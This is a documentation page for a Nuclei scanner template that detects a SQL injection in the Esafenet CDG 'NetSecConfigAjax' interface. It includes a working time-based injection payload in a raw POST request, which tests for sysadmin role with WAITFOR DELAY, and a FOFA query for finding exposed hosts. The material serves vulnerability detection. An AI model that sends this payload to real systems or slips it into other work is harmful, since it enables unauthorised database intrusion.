Skip to content
Nuclei Templates

Esafenet CDG NetSecConfigAjax - Sql Injection

ID: esafenet-netsecconfigajax-sqli

Severity: high

Author: adeljck

Tags: esafenet,sqli

Description

Section titled “Description”

The state parameter of the NetSecConfigAjax interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions.

YAML Source

Section titled “YAML Source”
id: esafenet-netsecconfigajax-sqli


info:
  name: Esafenet CDG NetSecConfigAjax - Sql Injection
  author: adeljck
  severity: high
  description: |
    The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions.
  classification:
    cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: esafenet
    product: cdg
    fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
  tags: esafenet,sqli


http:
  - raw:
      - |
        POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--


    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"text/html")'
          - 'contains(body,"操作成功")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220647b92b80ee43fa2538fda766fbd134f952b7b90f57b2d992d6a2f631f037a190220525ac4f6ead3e8cbcf40ade3942d5542cf81f4c71bb505c08edb75467d0705ef:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml"

View on Github